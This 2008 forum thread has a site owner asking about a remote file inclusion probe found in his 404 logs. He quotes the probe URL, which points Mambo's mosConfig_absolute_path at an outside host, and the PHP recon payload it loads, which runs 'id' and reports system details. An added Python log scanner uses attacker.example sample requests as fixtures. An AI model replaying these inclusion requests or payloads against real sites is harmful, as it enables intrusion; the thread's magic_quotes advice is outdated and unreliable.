n8w Posted June 18, 2008

Here is a 404 I received

Page Requested: www.n8w.com//pear/PEAR/Frontend/CLI.php.php?mosConfig_absolute_path=http://web2.mars52.plusserver.de/contenido44/kurz/js/helpid.txt???

When I checked out the page it has this ... what is the hacker actually trying to do?

```php
<?php
function ConvertBytes($number)
{
    $len = strlen($number);
    if($len < 4)
    {
        return sprintf("%d b", $number);
    }
    if($len >= 4 && $len <=6)
    {
        return sprintf("%0.2f Kb", $number/1024);
    }
    if($len >= 7 && $len <=9)
    {
        return sprintf("%0.2f Mb", $number/1024/1024);
    }
    return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
```

Jabop Posted June 18, 2008

People try to do these types of 'hacks' a lot. A lot of CMS have had exploits that script kiddies think they can exploit, but have been fixed. I don't think it's something you should worry about.

rarebit Posted June 18, 2008

After putting the var into Google and php.net, it turns out to be something to do with the Mambo CMS, see http://www.google.co.uk/search?q=mosConfig_absolute_path&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

When an exploit like this is made known, hackers will fire it at many sites just in case they use the specified software and have the unpatched version...
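
As an added example (not part of the thread): a Python check that scans access-log lines for requests like the one n8w saw, where a query parameter such as mosConfig_absolute_path carries a remote URL. The log lines, hosts and the `allowed_params` allowlist are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines in Apache combined log format (not from the thread).
SAMPLE_LOG = """\
203.0.113.7 - - [18/Jun/2008:10:01:02 +0000] "GET //pear/PEAR/Frontend/CLI.php.php?mosConfig_absolute_path=http://attacker.example/probe.txt??? HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
203.0.113.7 - - [18/Jun/2008:10:01:03 +0000] "GET /index.php?option=com_x&mosConfig_absolute_path=http%3A%2F%2Fattacker.example%2Fprobe.txt%3F HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"
198.51.100.4 - - [18/Jun/2008:10:02:10 +0000] "GET /search.php?q=http+headers&page=2 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [18/Jun/2008:10:03:00 +0000] "GET /out.php?url=https://example.org/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# A parameter value that is itself a remote URL is the mark of this kind of probe.
REMOTE = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*" (\d{3})\b')

def find_rfi_probes(log_text, allowed_params=frozenset()):
    """Return one dict per query parameter whose decoded value is a remote URL.

    allowed_params is a hypothetical, site-specific set of parameter names
    that legitimately carry URLs (for example a redirect target).
    """
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        # Split by hand: a target starting with "//" confuses URL parsers.
        query = target.partition("?")[2].partition("#")[0]
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name not in allowed_params and REMOTE.match(value):
                hits.append({"ip": ip, "status": int(status),
                             "param": name, "url": value})
    return hits

if __name__ == "__main__":
    for hit in find_rfi_probes(SAMPLE_LOG, allowed_params={"url"}):
        print(hit)
```

A 404 on such a request, as in n8w's case, means the targeted script is not on the site; a 200 on a script that does exist deserves a closer look.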

n8w Posted June 18, 2008

Ahh ... what is the best way to avoid hacks? My site recently was hacked to pieces ... I am working on a sanitizing function and magic_quotes for SQL injection .. but I am wondering if I should use something like http://htmlpurifier.org/comparison.html or if that is overkill? 'Cause ideally I would like to avoid using 3rd party stuff

rarebit Posted June 18, 2008

It all depends upon what your site does...

n8w Posted June 18, 2008

Well ... it mainly serves as a link portal with a searchable database and a way to upload images

Jabop Posted June 18, 2008

> ahh ... what is the best way to avoid hacks?

Keep your software up to date. That's all.